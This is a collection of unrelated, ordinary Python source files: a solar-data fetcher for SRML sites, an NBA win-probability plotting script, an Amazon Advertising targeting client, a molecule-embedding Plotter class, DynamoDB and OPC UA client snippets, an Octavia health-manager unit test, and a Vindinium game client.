Returns
-------
DataFrame
A month of SRML data.
"""
extra_params = common.decode_extra_parameters(site)
station_code = extra_params['network_api_abbreviation']
interval_length = extra_params['observation_interval_length']
file_types = FILE_TYPE_MAP[interval_length]
for file_type in file_types:
# The list file_types are listed with processed data
# file types first. On a successful retrieval we return
# the month of data, otherwise we log info and continue
# until we've exhausted the list.
try:
srml_month = iotools.read_srml_month_from_solardat(
station_code, year, month, file_type)
except error.URLError:
logger.warning(f'Could not retrieve {file_type} for SRML data '
f'for site {site.name} on {year}/{month} .')
logger.debug(f'Site abbreviation: {station_code}')
continue
except pd.errors.EmptyDataError:
logger.warning(f'SRML returned an empty file for station '
f'{site.name} on {year}/{month}.')
continue
else:
return srml_month
logger.warning(f'Could not retrieve data for site {site.name} on '
f'{year}/{month}.')
def fetch(api, site, start, end):
"""Retrieve observation data for a srml site between start and end.
Parameters
----------
api : :py:class:`solarforecastarbiter.io.api.APISession`
An APISession with a valid JWT for accessing the Reference Data
user.
site : :py:class:`solarforecastarbiter.datamodel.Site`
Site object with the appropriate metadata.
start : datetime
The beginning of the period to request data for. Must include timezone.
end : datetime
The end of the period to request data for. Must include timezone.
Returns
-------
data : pandas.DataFrame
All of the requested data concatenated into a single DataFrame.
Raises
------
TypeError
If start and end have different timezones, or if they do not include a
timezone.
"""
month_dfs = []
start_year = start.year
start_month = start.month
# Retrieve each month file necessary
if start.tzinfo != end.tzinfo:
raise TypeError('start and end cannot have different timezones')
while start_year * 100 + start_month <= end.year * 100 + end.month:
logger.info(f'Requesting data for SRML site {site.name}'
f' for {start_year}-{start_month}')
srml_month = request_data(site, start_year, start_month)
if srml_month is not None:
month_dfs.append(srml_month)
start_month += 1
if start_month > 12:
start_month = 1
start_year += 1
try:
all_period_data = pd.concat(month_dfs)
except ValueError:
logger.warning(f'No data available for site {site.name} '
f'from {start} to {end}.')
return pd.DataFrame()
var_columns = [col for col in all_period_data.columns
if '_flag' not in col]
power_columns = [col for col in var_columns
if col.startswith('5')]
# adjust power from watts to megawatts
for column in power_columns:
all_period_data[column] = all_period_data[column] / 1000000
all_period_data = all_period_data.loc[start:end, var_columns]
# remove possible trailing NaNs, it is necessary to do this after slicing
# because SRML data has nighttime data prefilled with 0s through the end of
# the month. This may not be effective if a given site has more than a 24
# hour lag, which will cause last_valid_index to return the latest
# timestamp just before sunrise, but will suffice for the typical lag on
# the order of hours.
all_period_data = all_period_data[:all_period_data.last_valid_index()]
return all_period_data
def initialize_site_observations(api, site):
"""Creates an observation at the site for each variable in
an SRML site's file.
Parameters
----------
api: :py:class:`solarforecastarbiter.io.api.APISession`
    site : :py:class:`solarforecastarbiter.datamodel.Site`
The site object for which to create Observations.
Notes
-----
Since variables are labelled with an integer instrument
number, Observations are named with their variable and
instrument number found in the source files.
    e.g. an SRML file contains two columns labelled 1001 and
1002. These columns represent GHI at instrument 1 and
instrument 2 respectively. The `pvlib.iotools` package
converts these to 'ghi_1' and 'ghi_2' for us. We use these
labels to differentiate between measurements recorded by
different instruments.
"""
# Request ~month old data at initialization to ensure we get a response.
start = pd.Timestamp.utcnow() - pd.Timedelta('30 days')
end = start
try:
extra_params = common.decode_extra_parameters(site)
except ValueError:
        logger.warning('Cannot create reference observations at SRML site '
f'{site.name}, missing required parameters.')
return
# use site name without network here to build
# a name with the original column label rather than
# the SFA variable
site_name = common.site_name_no_network(site)
try:
site_df = fetch(api, site, start, end)
except error.HTTPError:
logger.error('Could not find data to create observations '
f'for SRML site {site_name}.')
return
else:
if site_df is None:
logger.error('Could not find data to create observations '
f'for SRML site {site_name}.')
return
for variable in srml_variable_map.keys():
matches = [col for col in site_df.columns
if col.startswith(variable)]
for match in matches:
observation_extra_parameters = extra_params.copy()
observation_extra_parameters.update({
'network_data_label': match})
try:
# Here, we pass a name with match instead of variable
# to differentiate between multiple observations of
# the same variable
common.create_observation(
api, site, srml_variable_map[variable],
name=f'{site_name} {match}',
interval_label='beginning',
extra_params=observation_extra_parameters)
except HTTPError as e:
logger.error(
f'Failed to create {variable} observation at Site '
f'{site.name}. Error: {e.response.text}')
with open(DEFAULT_SITEFILE) as fp:
obs_metadata = json.load(fp)['observations']
for obs in obs_metadata:
obs_site_extra_params = json.loads(obs['site']['extra_parameters'])
if obs_site_extra_params['network_api_id'] == extra_params[
'network_api_id']:
obs['site'] = site
observation = Observation.from_dict(obs)
common.check_and_post_observation(api, observation)
def initialize_site_forecasts(api, site):
"""
Create a forecasts for each variable measured at the site
Parameters
----------
api : :py:class:`solarforecastarbiter.io.api.APISession`
An active Reference user session.
site : :py:class:`solarforecastarbiter.datamodel.Site`
The site object for which to create Forecasts.
"""
variables = list(srml_variable_map.values())
if isinstance(site, SolarPowerPlant):
variables += ['ac_power', 'dc_power']
common.create_forecasts(
api, site, variables,
default_forecasts.TEMPLATE_FORECASTS)
def update_observation_data(api, sites, observations, start, end, *,
gaps_only=False):
"""Post new observation data to a list of SRML Observations
from start to end.
api : :py:class:`solarforecastarbiter.io.api.APISession`
An active Reference user session.
sites: list of :py:class:`solarforecastarbiter.datamodel.Site`
List of all reference sites as Objects
observations: list of :py:class:`solarforecastarbiter.datamodel.Observation`
List of all reference observations as Objects
start : datetime
The beginning of the period to request data for.
end : datetime
The end of the period to request data for.
gaps_only : bool, default False
If True, only update periods between start and end where there
are data gaps.
""" # noqa
srml_sites = common.filter_by_networks(sites, 'UO SRML')
for site in srml_sites:
common.update_site_observations(api, fetch, site, observations,
start, end, gaps_only=gaps_only)
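# Illustrative end-to-end flow (kept as a comment: it assumes a configured
# reference-data APISession; the listing calls and timestamps shown are
# indicative only):
#
#   api = ...  # solarforecastarbiter.io.api.APISession with a reference-user token
#   sites = api.list_sites()
#   observations = api.list_observations()
#   start = pd.Timestamp('2020-01-01T00:00Z')
#   end = pd.Timestamp('2020-01-02T00:00Z')
#   update_observation_data(api, sites, observations, start, end)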
|
the-stack_106_22113
|
################################################################################
# TLGProb: Two-Layer Gaussian Process Regression Model For
# Winning Probability Calculation of Two-Team Sports
# Github: https://github.com/MaxInGaussian/TLGProb
# Author: Max W. Y. Lam ([email protected])
################################################################################
try:
from TLGProb import TLGProb
except:
print("TLGProb is not installed yet! Trying to call directly from source...")
from sys import path
path.append("../")
from TLGProb import TLGProb
print("done.")
def performance_given_threshold(res, thre):
corr, incorr, rej = 0, 0, 0
for prob, corr_pred, y_pred, y_true in res:
if(prob > thre):
if(corr_pred):
corr += 1
else:
incorr += 1
else:
rej += 1
return corr, incorr, rej
TLGProb_NBA = TLGProb()
TLGProb_NBA.load_data()
res = TLGProb_NBA.eval_accuracy(2019)
## Visualize Result of Evaluation
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
n = len(res)
thres, corrs, incorrs = [], [], []
line_x, line_y, line_z = [], [], []
for i in range(501):
thre = 0.5+i*1./1000
line_x.append(thre)
corr, incorr, rej = performance_given_threshold(res, thre)
acc = 100 if corr+incorr == 0 else corr*100./(corr+incorr)
thres.append(thre)
corrs.append(corr)
incorrs.append(incorr)
line_y.append(acc)
rejp = rej*100./n
line_z.append(rejp)
fig, ax = plt.subplots(figsize=(10, 8), dpi=300)
ax.stackplot(thres, [incorrs, corrs], colors=["red", "green"], alpha=0.5)
ax.set_xlim([0.5, 1])
plt.xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
plt.ylabel("Number of Matches", fontsize=18)
p1 = Rectangle((0, 0), 1, 1, fc="green", alpha=0.5)
p2 = Rectangle((0, 0), 1, 1, fc="red", alpha=0.5)
plt.legend([p1, p2], ['Correct Prediction', 'Incorrect Prediction'], prop={'size':15})
plt.tight_layout(True)
fig.savefig('../correct_vs_incorrect.eps')
fig, ax = plt.subplots(figsize=(10, 8), dpi=300)
ax.plot(line_x, line_y, 'b-', label="Accuracy")
plt.xlim([0.5, 1.0])
plt.ylim([line_y[0], 100.])
plt.xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
plt.ylabel("Accuracy (%)", fontsize=18)
plt.tight_layout(True)
fig.savefig('../accuracy.eps')
fig, ax = plt.subplots(figsize=(10, 8), dpi=300)
ax.plot(line_x, line_z, 'r--', label="Rejection percentage")
plt.xlim([0.5, 1.0])
plt.ylim([0., 100.])
plt.xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
plt.ylabel("Rejection Percentage (%)", fontsize=18)
plt.tight_layout(True)
fig.savefig('../rejection.eps')
fig, ax = plt.subplots(2, 1, sharex=True, figsize=(10, 8), dpi=300)
ax[0].stackplot(line_x, line_y, colors=['blue'], alpha=0.5)
ax[0].set_xlim([0.5, 1.0])
ax[0].set_ylim([line_y[0], 100.])
ax[0].set_ylabel("Accuracy (%)", fontsize=18)
ax[1].stackplot(line_x, line_z, colors=['red'], alpha=0.5)
ax[1].set_xlim([0.5, 1.0])
ax[1].set_ylim([0., 100.])
ax[1].set_xlabel("Acceptance Threshold of Winning Probability", fontsize=18)
ax[1].set_ylabel("Rejection Percentage (%)", fontsize=18)
plt.tight_layout(True)
fig.savefig('../accuracy_vs_rejection.eps')
|
the-stack_106_22114
|
from ..client import Client
class ProductTargeting(Client):
def get_targets(self, next_token: str = None, max_results: int = 0, filters: list = None):
self.uri_path = "/sb/targets/list"
self.method = "post"
self.data = {
"nextToken": next_token,
"maxResults": max_results,
"filters": filters
}
return self.execute()
def update_targets(self, data):
self.uri_path = "/sb/targets"
self.method = "put"
self.data = data
return self.execute()
def create_targets(self, data):
self.uri_path = "/sb/targets"
self.method = "post"
self.data = data
return self.execute()
def get_targets_by_id(self, target_id):
self.uri_path = "/sb/targets/{}".format(target_id)
self.method = "get"
return self.execute()
def delete_targets_by_id(self, target_id):
self.uri_path = "/sb/targets/{}".format(target_id)
self.method = "delete"
return self.execute()
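# Illustrative usage sketch (kept as a comment: it assumes the inherited Client
# base class is constructed with valid Amazon Advertising API credentials):
#
#   pt = ProductTargeting(...)            # arguments as expected by Client
#   listing = pt.get_targets(max_results=50)
#   created = pt.create_targets([{...}])  # target definitions per the SB targets API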
|
the-stack_106_22116
|
import descriptors as desc
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.manifold import TSNE
import umap
import seaborn as sns
from scipy import stats
import numpy as np
import math
import matplotlib.pyplot as plt
class Plotter(object):
"""
A class used to plot the ECFP fingerprints of the molecules used to
instantiate it.
"""
def __init__(self, encoding_list, target, target_type, sim_type, get_desc, get_fingerprints):
        # Error handling sim_type
if sim_type != 'structural' and sim_type != 'tailored':
if len(target) > 0:
sim_type = 'tailored'
print('sim_type indicates the similarity type by which the plots are constructed.\n' +
'The supported similarity types are structural and tailored.\n' +
                      'Because a target list has been provided, \'tailored\' has been selected as sim_type.')
else:
sim_type = 'structural'
print('sim_type indicates the similarity type by which the plots are constructed.\n' +
'The supported similarity types are structural and tailored.\n' +
                      'Because no target list has been provided, \'structural\' has been selected as sim_type.')
if sim_type == "tailored" and len(target) == 0:
raise Exception("Target values missing")
self.sim_type = sim_type
        # Error handling target_type
if len(target) > 0:
df_target = pd.DataFrame(data=target)
unique_targets_ratio = 1.*df_target.iloc[:, 0].nunique()/df_target.iloc[:, 0].count() < 0.05
if target_type == 'R' and unique_targets_ratio:
                print('Input received is \'R\' for target values that do not appear to be continuous.')
if target_type != 'R' and target_type != 'C':
if unique_targets_ratio:
self.target_type = 'C'
print('target_type indicates if the target is a continuous variable or a class label.\n'+
'R stands for regression and C for classification. Input R as target type for continuous variables and C for class labels.\n'+
'From analysis of the target, C has been selected for target_type.')
else:
self.target_type = 'R'
print('target_type indicates if the target is a continuous variable or a class label.\n'+
'R stands for regression and C for classification. Input R as target type for continuous variables and C for class labels.\n'+
'From analysis of the target, R has been selected for target_type.')
else:
self.target_type = target_type
# Instantiate Plotter class
if sim_type == "tailored":
df_descriptors = get_desc(encoding_list)
self.df_descriptors, self.target = desc.select_descriptors_lasso(df_descriptors,target,kind=target_type)
else:
self.df_descriptors, self.target = get_fingerprints(encoding_list,target,2,2048)
@classmethod
def from_smiles(cls, smiles_list, target=[], target_type=None, sim_type=None):
"""
Class method to construct a Plotter object from a list of SMILES.
        :param smiles_list: List of the SMILES representations of the molecules to plot.
        :type smiles_list: list
        :param target: target values
        :type target: list
        :param target_type: target type R (regression) or C (classification)
        :type target_type: string
:param sim_type: similarity type structural or tailored
:type sim_type: string
:returns: A Plotter object for the molecules given as input.
:rtype: Plotter
"""
return cls(smiles_list, target, target_type, sim_type, desc.get_mordred_descriptors, desc.get_ecfp)
@classmethod
def from_inchi(cls, inchi_list, target=[], target_type=None, sim_type=None):
"""
Class method to construct a Plotter object from a list of InChi.
        :param inchi_list: List of the InChI representations of the molecules to plot.
        :type inchi_list: list
        :param target: target values
        :type target: list
        :param target_type: target type R (regression) or C (classification)
        :type target_type: string
:param sim_type: similarity type structural or tailored
:type sim_type: string
:returns: A Plotter object for the molecules given as input.
:rtype: Plotter
"""
return cls(inchi_list, target, target_type, sim_type, desc.get_mordred_descriptors_from_inchi, desc.get_ecfp_from_inchi)
def pca(self, kind="scatter", size=20, remove_outliers=False, is_colored=True, colorbar=False):
"""
Calculates the first 2 PCA components of ECFP fingerprints and plots
the data based on the result.
:param kind: Type of plot (default is scatter plot)
:type kind: string
:param size: Size of the plot (default size)
:type size: int
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed (default False)
:type remove_outliers: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
# Scale the data
if self.sim_type == "tailored":
data = StandardScaler().fit_transform(self.df_descriptors.values.tolist())
else:
data = self.df_descriptors.values.tolist()
# Linear dimensionality reduction to 2 components by PCA
pca = PCA(n_components=2)
first2ecpf_components = pca.fit_transform(data)
coverage_components = pca.explained_variance_ratio_
# Create labels for the plot
first_component = "PC-1 (" + "{:.0%}".format(coverage_components[0]) + ")"
second_component = "PC-2 (" + "{:.0%}".format(coverage_components[1]) + ")"
        # Create a dataframe containing the first 2 PCA components of ECFP
self.df_2_components = pd.DataFrame(data = first2ecpf_components
, columns = [first_component, second_component])
# Create a plot based on the PCA model
pca_plot = self.construct_plot(first_component, second_component, size, kind, "PCA plot", remove_outliers, is_colored, colorbar)
return pca_plot
def tsne(self, perplexity=None, random_state=None, pca=False, kind="scatter", size=20, remove_outliers=False, is_colored=True, colorbar=False):
"""
Calculates the first 2 t-SNE components of ECFP fingerprints and plots
the data based on the result.
:param perplexity: perplexity value for the t-SNE model
:type perplexity: int
        :param pca: If True, the data is first reduced to 30 components by PCA before running t-SNE (default False)
        :type pca: boolean
:param kind: Type of plot (default is scatter plot)
:type kind: string
:param size: Size of the plot (default size)
:type size: int
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed (default False)
:type remove_outliers: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
# Scale the data
if self.sim_type == "tailored":
self.data = StandardScaler().fit_transform(self.df_descriptors.values.tolist())
else:
self.data = self.df_descriptors.values.tolist()
plot_title = "t-SNE plot"
# Preprocess the data with PCA
if pca and self.sim_type == "structural":
pca = PCA(n_components=30, random_state=random_state)
self.data = pca.fit_transform(self.data)
plot_title = "t-SNE plot from components with cumulative variance explained " + "{:.0%}".format(sum(pca.explained_variance_ratio_))
# Define the perplexity of the model
if perplexity == None:
perplexity_value = max(5, min(math.sqrt(len(self.data)), 50))
else:
if perplexity<5 or perplexity>50:
                print('The perplexity is related to the number of nearest neighbors that is used in other manifold learning algorithms.\n'+
                      'Robust results are obtained for values of perplexity between 5 and 50. The value provided is outside that range.\n'+
                      'Therefore the closest value between 5 and 50 to the provided value has been used in the method.')
perplexity_value = max(5, min(perplexity, 50))
# Embed the data in two dimensions
self.tsne_fit = TSNE(n_components=2, perplexity=perplexity_value, random_state=random_state)
ecfp_tsne_embedding = self.tsne_fit.fit_transform(self.data)
        # Create a dataframe containing the first 2 TSNE components of ECFP
self.df_2_components = pd.DataFrame(data = ecfp_tsne_embedding
, columns = ['t-SNE-1', 't-SNE-2'])
# Create a plot based on the TSNE model
tsne_plot = self.construct_plot('t-SNE-1', 't-SNE-2', size, kind, plot_title, remove_outliers, is_colored, colorbar)
return tsne_plot
def umap(self, n_neighbors=None, min_dist=None, random_state=None, kind="scatter", size=20, remove_outliers=False, is_colored=True, colorbar=False):
"""
Calculates the first 2 UMAP components of ECFP fingerprints and plots
the data based on the result.
        :param n_neighbors: Number of neighbours used in the UMAP model.
        :type n_neighbors: int
:param kind: Type of plot (default is scatter plot)
:type kind: string
:param size: Size of the plot (default size)
:type size: int
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed (default False)
:type remove_outliers: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
# Scale the data
if self.sim_type == "tailored":
self.data = StandardScaler().fit_transform(self.df_descriptors.values.tolist())
else:
self.data = self.df_descriptors.values.tolist()
if n_neighbors == None:
n_neighbors = max(2, min(15, len(self.data)//4))
else:
if n_neighbors<2 or n_neighbors>(len(self.data)//4):
                print('n_neighbors represents the size of the local neighborhood UMAP will look at when attempting to learn the manifold structure of the data.\n'+
                      'Robust results are obtained for values of n_neighbors between 2 and a quarter of the data. The value provided is outside that range.\n'+
                      'Therefore the closest value, between 2 and a quarter of the data, to the provided value has been used in the method.')
n_neighbors = max(2, min(n_neighbors, len(self.data)//4))
if min_dist == None:
min_dist = 0.9
else:
if min_dist<0.0 or min_dist>0.99:
                print('min_dist controls how tightly UMAP is allowed to pack points together.\n'+
                      'The value of min_dist can range from 0.0 up to 0.99. The value provided is outside that range.\n'+
                      'Therefore the closest value between 0.0 and 0.99 to the provided value has been used in the method.')
min_dist = max(0.0, min(min_dist, 0.99))
# Embed the data in two dimensions
self.umap_fit = umap.UMAP(n_neighbors=n_neighbors, min_dist=min_dist, random_state=random_state, n_components=2)
ecfp_umap_embedding = self.umap_fit.fit_transform(self.data)
        # Create a dataframe containing the first 2 UMAP components of ECFP
self.df_2_components = pd.DataFrame(data = ecfp_umap_embedding
, columns = ['UMAP-1', 'UMAP-2'])
        # Create a plot based on the UMAP model
umap_plot = self.construct_plot('UMAP-1', 'UMAP-2', size, kind, "UMAP plot", remove_outliers, is_colored, colorbar)
return umap_plot
def tmap():
"""
Calculates and plots the TMAP based on ECFP fingerprints.
:returns: plot object
"""
pass
def construct_plot(self, x, y, size, kind, title, remove_outliers, is_colored, colorbar):
"""
        Generates a plot of the molecules stored in self.df_2_components,
        embedded in two dimensions.
:param x: The first column of the dataframe containing the molecules
:type x: string
:param y: The second column of the dataframe containing the molecules
:type y: string
:param size: Size of the plot
:type size: int
:param kind: Type of plot
:type kind: string
:param title: Title of the plot
:type title: string
:param remove_outliers: Boolean value indicating if the outliers must be identified and removed
:type remove_outliers: boolean
:param is_colored: Indicates if the points must be colored according to target
:type is_colored: boolean
:returns: The matplotlib axes containing the plot.
:rtype: Axes
"""
if kind != 'scatter' and kind != 'hex' and kind != 'kde':
kind = 'scatter'
            print('kind indicates which type of plot must be visualized. Currently supported visualizations are:\n'+
                  '-scatter plot (scatter)\n'+
                  '-hexagon plot (hex)\n'+
                  '-kernel density estimation plot (kde)\n'+
                  'Please input one of scatter, hex or kde for the parameter kind.\n'+
                  'scatter has been used as the default.')
df_2_components = self.df_2_components
# Define colors
hue = None
palette = None
if len(self.target) == 0:
            is_colored = False
else:
if is_colored:
df_2_components = df_2_components.assign(target=self.target)
hue = 'target'
if self.target_type == "R":
palette = sns.color_palette("inferno", as_cmap=True)
# Remove outliers (using Z-score)
if remove_outliers:
z_scores = stats.zscore(df_2_components[[x,y]])
abs_z_scores = np.abs(z_scores)
filtered_entries = (abs_z_scores < 3).all(axis=1)
df_2_components = df_2_components[filtered_entries]
# Define plot looks parameters
sns.set_style("dark")
sns.set_context("notebook", font_scale=size*0.15)
fig, ax = plt.subplots(figsize=(size,size))
        # Create a plot based on the 2D embedding
if kind == "scatter":
plot = sns.scatterplot(x=x, y=y, hue=hue, palette=palette, data=df_2_components, s=80)
plot.set_label("scatter")
axis = plot
# Add colorbar
if self.target_type == "R" and colorbar:
plot.get_legend().remove()
norm = plt.Normalize(df_2_components['target'].min(), df_2_components['target'].max())
cm = plt.cm.ScalarMappable(cmap="inferno", norm=norm)
cm.set_array([])
plot.figure.colorbar(cm)
elif kind == "hex":
plot = ax.hexbin(df_2_components[x], df_2_components[y], gridsize=40, cmap='Blues')
fig.colorbar(plot, ax=ax)
ax.set_label("hex")
axis = ax
elif kind == "kde":
plot = sns.kdeplot(x=x, y=y, shade=True, data=df_2_components)
plot.set_label("kde")
axis = plot
# Remove units from axis
axis.set(yticks=[])
axis.set(xticks=[])
# Add labels
axis.set_title(title,fontsize=size*2)
axis.set_xlabel(x,fontsize=size*2)
axis.set_ylabel(y,fontsize=size*2)
#Do not stretch image
#plot.axis('square')
self.df_plot_xy = df_2_components[[x,y]]
return axis
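# Illustrative usage sketch (kept as a comment: it requires the chemistry and
# embedding dependencies used above, e.g. the descriptors module, umap-learn and
# seaborn; the SMILES strings and target values are hypothetical examples):
#
#   smiles = ['CCO', 'CCN', 'c1ccccc1', 'CC(=O)O']
#   logp = [-0.3, -0.1, 2.1, -0.2]
#   plotter = Plotter.from_smiles(smiles, target=logp, target_type='R',
#                                 sim_type='structural')
#   ax = plotter.pca(kind='scatter')
#
# With a larger molecule set, plotter.tsne() and plotter.umap() produce the
# corresponding embeddings in the same way.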
|
the-stack_106_22118
|
import boto3
from boto3.dynamodb.conditions import Key
from pprint import pprint
def get_item():
"""Get item from the DynamoDB table."""
dynamo_db = boto3.resource("dynamodb")
table = dynamo_db.Table("devices")
response = table.query(KeyConditionExpression=Key("name").eq("core02-wdc01"))
for item in response["Items"]:
pprint(item)
if __name__ == "__main__":
get_item()
|
the-stack_106_22119
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module to create an OPC UA client. Reference code:
https://github.com/FreeOpcUa/python-opcua/tree/master/examples
"""
#import sys
#sys.path.insert(0, "..")
import logging
import logging.config
import yaml
import coloredlogs
from opcua import Client
logger = logging.getLogger(__name__)
__author__ = "Brent Maranzano"
__license__ = "MIT"
if __name__ == "__main__":
client = Client("opc.tcp://python-opcua-server:4840/freeopcua/server/")
# client = Client("opc.tcp://admin@localhost:4840/freeopcua/server/") #connect using a user
try:
client.connect()
# Client has a few methods to get proxy to UA nodes that should always be in address space such as Root or Objects
root = client.get_root_node()
print("Objects node is: ", root)
# Node objects have methods to read and write node attributes as well as browse or populate address space
print("Children of root are: ", root.get_children())
# get a specific node knowing its node id
#var = client.get_node(ua.NodeId(1002, 2))
#var = client.get_node("ns=3;i=2002")
#print(var)
#var.get_data_value() # get value of node as a DataValue object
#var.get_value() # get value of node as a python builtin
#var.set_value(ua.Variant([23], ua.VariantType.Int64)) #set node value using explicit data type
#var.set_value(3.9) # set node value using implicit data type
# Now getting a variable node using its browse path
myvar = root.get_child(["0:Objects", "2:MyObject", "2:MyVariable"])
obj = root.get_child(["0:Objects", "2:MyObject"])
print("myvar is: ", myvar)
print("myobj is: ", obj)
# Stacked myvar access
# print("myvar is: ", root.get_children()[0].get_children()[1].get_variables()[0].get_value())
finally:
client.disconnect()
|
the-stack_106_22121
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import signal
import mock
from octavia.cmd import health_manager
from octavia.tests.unit import base
class TestHealthManagerCMD(base.TestCase):
def setUp(self):
super(TestHealthManagerCMD, self).setUp()
@mock.patch('multiprocessing.Event')
@mock.patch('octavia.amphorae.drivers.health.'
'heartbeat_udp.UDPStatusGetter')
def test_hm_listener(self, mock_getter,
mock_event):
mock_event.is_set.side_effect = [False, False, True]
getter_mock = mock.MagicMock()
check_mock = mock.MagicMock()
getter_mock.check = check_mock
getter_mock.check.side_effect = [None, Exception('break')]
mock_getter.return_value = getter_mock
health_manager.hm_listener(mock_event)
mock_getter.assert_called_once()
self.assertEqual(2, getter_mock.check.call_count)
@mock.patch('multiprocessing.Event')
@mock.patch('futurist.periodics.PeriodicWorker.start')
@mock.patch('futurist.periodics.PeriodicWorker.__init__')
@mock.patch('signal.signal')
@mock.patch('octavia.controller.healthmanager.'
'health_manager.HealthManager')
def test_hm_health_check(self, mock_health, mock_signal, mock_worker,
mock_start, mock_event):
mock_event.is_set.side_effect = [False, True]
hm_mock = mock.MagicMock()
mock_worker.return_value = None
health_check_mock = mock.MagicMock()
hm_mock.health_check = health_check_mock
mock_health.return_value = hm_mock
health_manager.hm_health_check(mock_event)
mock_health.assert_called_once_with(mock_event)
@mock.patch('multiprocessing.Process')
@mock.patch('octavia.common.service.prepare_service')
def test_main(self, mock_service, mock_process):
mock_listener_proc = mock.MagicMock()
mock_health_proc = mock.MagicMock()
mock_process.side_effect = [mock_listener_proc, mock_health_proc]
health_manager.main()
mock_listener_proc.start.assert_called_once_with()
mock_health_proc.start.assert_called_once_with()
mock_listener_proc.join.assert_called_once_with()
mock_health_proc.join.assert_called_once_with()
@mock.patch('os.kill')
@mock.patch('multiprocessing.Process')
@mock.patch('octavia.common.service.prepare_service')
def test_main_keyboard_interrupt(self, mock_service, mock_process,
mock_kill):
mock_listener_proc = mock.MagicMock()
mock_health_proc = mock.MagicMock()
mock_join = mock.MagicMock()
mock_join.side_effect = [KeyboardInterrupt, None]
mock_listener_proc.join = mock_join
mock_process.side_effect = [mock_listener_proc, mock_health_proc]
health_manager.main()
mock_listener_proc.start.assert_called_once_with()
mock_health_proc.start.assert_called_once_with()
self.assertEqual(2, mock_listener_proc.join.call_count)
mock_health_proc.join.assert_called_once_with()
mock_kill.assert_called_once_with(mock_health_proc.pid,
signal.SIGINT)
@mock.patch('os.kill')
@mock.patch('oslo_config.cfg.CONF.mutate_config_files')
def test_handle_mutate_config(self, mock_mutate, mock_kill):
health_manager._handle_mutate_config(1, 2)
mock_mutate.assert_called_once()
calls = [mock.call(1, signal.SIGHUP), mock.call(2, signal.SIGHUP)]
mock_kill.assert_has_calls(calls)
|
the-stack_106_22122
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import webbrowser
import sys
CONFIG_KEYS = ['mode']
DIRECTIONS = ['Stay', 'North', 'South', 'East', 'West']
TIMEOUT = 15
# This is the class that a program interacts with
class client:
"""A client for interacting with the vindinium server"""
def __init__(self):
self.key = None
self.game = None
self.hero = None
self.viewUrl = None
self.playUrl = None
self.config = {}
self.session = None
def setKey(self, key):
self.key = key
def setParam(self, key, value):
# Apply checks to make sure the key is a valid setting
if key in CONFIG_KEYS:
self.config[key] = value
else:
print('Skipping', key, 'because it is not a valid config parameter.')
def startGame(self):
self.session = requests.session()
server_url = 'http://vindinium.org'
if self.config['mode'] == 'arena':
api_url = '/api/arena'
else:
api_url = '/api/training'
response = self._request({'key': self.key}, server_url + api_url)
if response == None:
print('Error: game could not be initialized')
sys.exit(1)
self.game = Game(response['game'])
self.hero = Hero(response['hero'])
self.viewUrl = response['viewUrl']
self.playUrl = response['playUrl']
# Print a message that the game has started
        print('Game Started at:', self.viewUrl)
webbrowser.open(self.viewUrl)
def makeMove(self, move):
"""Make a move and update the client's state"""
if move not in DIRECTIONS:
move = 'Stay'
response = self._request({'dir': move})
self.game = Game(response['game'])
self.hero = Hero(response['hero'])
def close(self):
self.session.close()
def _request(self, params = {}, url = None):
"""Send a move to the vindinium server"""
if url == None:
url = self.playUrl
try:
response = self.session.post(url, params, timeout=TIMEOUT)
if response.status_code == 200:
# HTTP OK
return response.json()
else:
print("HTTP Error", str(response.status_code), ":", response.text)
sys.exit(1)
except requests.exceptions.RequestException as e:
print('Error in request:', str(e))
class Game:
"""A class representing the vindinium game object"""
def __init__(self, state):
# Set the default values of the game
self.state = state
self.heroes = []
self.turn = state['turn']
self.maxTurns = state['maxTurns']
self.finished = state['finished']
self.board = Board(state['board'])
for i in range(0, len(state['heroes'])):
self.heroes.append(Hero(state['heroes'][i]))
def results(self):
print('Finished.')
class Board:
"""A class representing the board of the game"""
def __init__(self, board):
self.size = None
self.map = []
self.mines = []
self.process(board)
def process(self, board):
self.size = board['size']
# Loop through the tiles to add locations to the map
# y is the row number, x is the col number
for y in range(0, len(board['tiles']), self.size * 2):
maprow = []
for x in range(0, self.size * 2, 2):
tile = board['tiles'][x+y]
if tile == ' ':
# empty space
maprow.append(' ')
elif tile == '#':
# wall
maprow.append('#')
elif tile == '$':
# mine
self.mines.append((int(y/(self.size*2)),int(x/2)))
next_tile = board['tiles'][x+y+1]
if next_tile == '1':
maprow.append('r')
elif next_tile == '2':
maprow.append('b')
elif next_tile == '3':
maprow.append('g')
elif next_tile == '4':
maprow.append('y')
elif next_tile == '-':
maprow.append('$')
elif tile == '[':
# tavern
maprow.append('T')
elif tile == '@':
# player
next_tile = board['tiles'][x+y+1]
if next_tile == '1':
maprow.append('R')
elif next_tile == '2':
maprow.append('B')
elif next_tile == '3':
maprow.append('G')
elif next_tile == '4':
maprow.append('Y')
self.map.append(maprow)
def __getitem__(self, index):
return self.map[index]
def __str__(self):
result = ''
for row in range(0, len(self.map)):
result += ''.join(self.map[row]) + '\n'
return result
class Hero:
"""A class representing the vindinium hero object"""
def __init__(self, hero):
try:
self.lastDir = hero['lastDir']
except KeyError:
self.lastDir = None
self.pos = (hero['pos']['x'], hero['pos']['y'])
self.life = hero['life']
self.gold = hero['gold']
self.mineCount = hero['mineCount']
self.spawnPos = (hero['spawnPos']['x'], hero['spawnPos']['y'])
self.crashed = hero['crashed']
if __name__ == '__main__':
pass
